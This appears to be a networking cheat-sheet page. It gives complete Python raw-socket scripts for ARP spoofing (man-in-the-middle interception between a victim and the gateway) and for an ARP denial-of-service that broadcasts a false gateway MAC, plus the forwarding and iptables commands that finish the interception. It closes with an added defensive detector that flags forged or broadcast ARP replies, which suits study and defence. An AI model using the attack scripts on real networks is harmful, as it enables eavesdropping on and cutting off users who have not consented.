## ARP Spoofing

Python script for ARP spoofing:

```py
import socket
import time

interface = 'eth0'  # interface on the listening machine
mac = b'\x30\xa1\x06\x39\x7d\x25'  # mac of the listening machine
gateway_ip = socket.inet_aton('192.168.1.1')  # ip of the gateway (router)
gateway_mac = b'\xf5\x32\xd1\x3f\x61\x22'  # mac of the gateway (router)
victim_ip = socket.inet_aton('192.168.1.47')  # ip of the machine we want to spoof
victim_mac = b'\x25\x34\x73\xab\x14\x2b'  # mac of the machine we want to spoof

connect = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
connect.bind((interface, socket.htons(0x0800)))

arp_code = b'\x08\x06'   # EtherType: ARP
htype = b'\x00\x01'      # hardware type: Ethernet
ptype = b'\x08\x00'      # protocol type: IPv4
hlen = b'\x06'           # hardware address length
plen = b'\x04'           # protocol address length
operation = b'\x00\x02'  # opcode 2: ARP reply
protocol = htype + ptype + hlen + plen + operation

# Ethernet headers: destination MAC + source MAC + EtherType
eth_packet_1 = victim_mac + mac + arp_code
eth_packet_2 = gateway_mac + mac + arp_code

# ARP payload: sender MAC + sender IP + target MAC + target IP
request_victim = eth_packet_1 + protocol + mac + gateway_ip + victim_mac + victim_ip
request_gateway = eth_packet_2 + protocol + mac + victim_ip + gateway_mac + gateway_ip

while True:
    connect.send(request_victim)
    connect.send(request_gateway)
    time.sleep(1)
```

Packets from the victim machine, as well as packets from the gateway, will go through our machine, so we need to turn on `forwarding`.

```sh
echo 1 > /proc/sys/net/ipv4/ip_forward
```

This change takes effect without reloading, but after the first reload forwarding will return to its default state. To make the change permanent, modify the `/etc/sysctl.conf` file and uncomment the line

```
#net.ipv4.ip_forward=1
```

We also need to add one record in `ip_tables`.

```sh
iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
```

## ARP DOS

The idea is to use a gratuitous ARP answer to tell all clients in the network the wrong gateway MAC.
```py
import socket
import time

interface = 'eth0'
random_mac = b'\x25\xd1\xa6\x5f\x36\x11'
random_ip = socket.inet_aton('192.168.1.56')
gateway_ip = socket.inet_aton('192.168.1.1')
broadcast_mac = b'\xff\xff\xff\xff\xff\xff'

connect = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
connect.bind((interface, socket.htons(0x0800)))

arp_code = b'\x08\x06'   # EtherType: ARP
htype = b'\x00\x01'      # hardware type: Ethernet
ptype = b'\x08\x00'      # protocol type: IPv4
hlen = b'\x06'           # hardware address length
plen = b'\x04'           # protocol address length
operation = b'\x00\x02'  # opcode 2: ARP reply
protocol = htype + ptype + hlen + plen + operation

# Ethernet header: destination MAC + source MAC + EtherType
eth_packet = broadcast_mac + random_mac + arp_code

# ARP payload: sender MAC + sender IP + target MAC + target IP
request = eth_packet + protocol + random_mac + gateway_ip + broadcast_mac + random_ip

while True:
    connect.send(request)
    time.sleep(1)
```

In this case there is no need to turn on forwarding, because devices will have the wrong MAC address in their ARP tables and will not be able to send packets to the proper destination.
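A defender's view of the two scripts above, as an added example that is not part of the original page: it parses the same 42-byte ARP reply layout and flags replies whose sender IP-to-MAC binding contradicts a pinned table, as well as replies addressed to the broadcast MAC. The `PINNED` table, the function names and the sample frames are assumptions constructed for illustration from the page's addresses.

```python
import socket
import struct

BROADCAST = b"\xff" * 6

def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)

def parse_arp(frame):
    """Return ARP fields from a raw Ethernet frame, or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":   # EtherType must be ARP
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_dst": frame[0:6], "op": op,
            "sender_mac": frame[22:28], "sender_ip": socket.inet_ntoa(frame[28:32])}

def check_frame(frame, pinned):
    """Check one frame against pinned IP -> MAC bindings; return a list of alerts."""
    arp = parse_arp(frame)
    if arp is None or arp["op"] != 2:   # both scripts above send ARP replies (opcode 2)
        return []
    alerts = []
    expected = pinned.get(arp["sender_ip"])
    if expected is not None and expected != arp["sender_mac"]:
        alerts.append("binding-mismatch %s is-at %s" % (arp["sender_ip"], fmt_mac(arp["sender_mac"])))
    if arp["eth_dst"] == BROADCAST:     # a reply sent to every host on the segment
        alerts.append("broadcast-reply %s" % arp["sender_ip"])
    return alerts

# Constructed sample frames (not captured traffic), built from the page's addresses.
REPLY = b"\x08\x06" + b"\x00\x01\x08\x00\x06\x04\x00\x02"   # EtherType + ARP header, opcode 2
GW_MAC = b"\xf5\x32\xd1\x3f\x61\x22"
VICTIM_MAC = b"\x25\x34\x73\xab\x14\x2b"
OTHER_MAC = b"\x30\xa1\x06\x39\x7d\x25"
RANDOM_MAC = b"\x25\xd1\xa6\x5f\x36\x11"
GW_IP = socket.inet_aton("192.168.1.1")
VICTIM_IP = socket.inet_aton("192.168.1.47")
PINNED = {"192.168.1.1": GW_MAC, "192.168.1.47": VICTIM_MAC}   # assumed known-good bindings

LEGIT = VICTIM_MAC + GW_MAC + REPLY + GW_MAC + GW_IP + VICTIM_MAC + VICTIM_IP
FORGED = VICTIM_MAC + OTHER_MAC + REPLY + OTHER_MAC + GW_IP + VICTIM_MAC + VICTIM_IP
FLOOD = BROADCAST + RANDOM_MAC + REPLY + RANDOM_MAC + GW_IP + BROADCAST + socket.inet_aton("192.168.1.56")

if __name__ == "__main__":
    for name, frame in (("legit", LEGIT), ("forged", FORGED), ("flood", FLOOD)):
        print(name, check_frame(frame, PINNED))
```

The same binding check is what static ARP entries or a switch's dynamic ARP inspection enforce at the host or network level; here it only reports.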